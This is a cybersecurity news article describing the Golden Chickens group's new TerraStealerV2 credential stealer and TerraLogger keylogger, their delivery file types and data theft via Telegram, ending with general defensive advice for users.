Golden Chickens Unleashes New Malware Tools Targeting Browsers, Crypto Wallets

Cybercriminal group Golden Chickens has resurfaced with a new set of malware tools designed to steal credentials, log keystrokes, and compromise user security on a large scale. The two new threats, named TerraStealerV2 malware and TerraLogger, are the latest additions to the group’s malware-as-a-service (MaaS) offerings, showcasing their ongoing efforts to evolve their cybercrime tactics.

Golden Chickens, also known as Venom Spider, has been linked to significant credential theft and infiltration campaigns in the past, most notably through its More_eggs malware. The new variants, however, indicate a strategic shift toward more aggressive targeting of browsers, crypto wallets, and user keystrokes. These malware tools are being distributed through various file formats, including EXE, msi, and LNK, making them difficult to detect and easy to spread.

TerraStealerV2 malware is engineered to extract sensitive user data from browsers and cryptocurrency wallets. It scans for browser credentials, accesses saved logins, and attempts to extract information from browser extensions, potentially leading to crypto wallet theft if the extensions are used for asset management or trading. The malware is often delivered via OCX payloads from shady domains. Once downloaded, it uses legitimate Windows utilities like regsvr32.exe and mshta.exe to execute its payload while evading security systems. Although it attempts to pull Chrome login data, it fails to bypass the newer Application Bound Encryption (ABE) protocols introduced in Chrome post-July 2024, suggesting that the tool may still be under active development or simply outdated. The data collected by TerraStealerV2 is sent to Telegram channels and external servers, providing attackers with real-time access to user credentials and activity.

Ask Aime: "Are cybercriminals targeting my browser and crypto wallet security with new malware like TerraStealerV2 and TerraLogger?"

TerraLogger, on the other hand, functions as a standalone keylogger, silently capturing every keystroke typed on the infected machine. From login credentials to personal chats, this malware can record it all. Although TerraLogger does not currently exfiltrate data or interact with any command-and-control (C2) servers, its design suggests future integration with broader malware campaigns. Golden Chickens may be planning to pair this keylogger with other tools in their ecosystem to create a more comprehensive infection chain. Despite its simplicity, TerraLogger poses a significant threat to browser security, especially when used in combination with data-exfiltration tools like TerraStealerV2.

Golden Chickens is employing a variety of file types to distribute their malware, increasing the chances of infection. Common delivery formats include executables (EXE), Microsoft Installer files (MSI), Windows Shortcut files (LNK), and OLE Control Extensions (OCX). This multi-format approach makes it more likely for unsuspecting users to install the malware. Once executed, the payloads spring into action, mining for data or logging inputs while avoiding basic antivirus scans. The use of known Windows utilities and Telegram for data transfer provides both obfuscation and control, as messages can be quickly customized or deleted on the attacker’s end.

The emergence of TerraStealerV2 signals a renewed focus on browser-based attacks. With many users storing credentials in browsers or using browser extensions to manage cryptocurrencies, a single infection could compromise access to financial platforms, crypto wallets, or even corporate intranets. The rise of crypto wallet theft through malware like TerraStealerV2 reflects a broader trend in cybercrime, where stealers are becoming more modular, customizable, and harder to detect. Even though both TerraStealerV2 and TerraLogger appear to still be under development, their current functionality is already dangerous. As Golden Chickens continues to refine these tools, we can expect even more stealth, deeper system penetration, and broader targeting capabilities.

The advent of new malware tools from Golden Chickens demonstrates how cybercriminals are developing new methodologies. Though TerraLogger is limited as purely a keylogger, it can perform some of the functions of a keylogger with the TerraStealerV2 malware or the rest of the malware toolkit as part of a greater multi-stage threat. With more reports of browser vulnerabilities and stolen crypto wallets, it is important to keep up with the ongoing availability of resources like Golden Chickens. Users and organizations should be tracking everything they download, limiting the amount of insecure software they use, and ensuring their browsers are up-to-date with the latest security protocols. The history of TerraStealerV2 and TerraLogger is just the start, and will continue to evolve, just as our responses must evolve.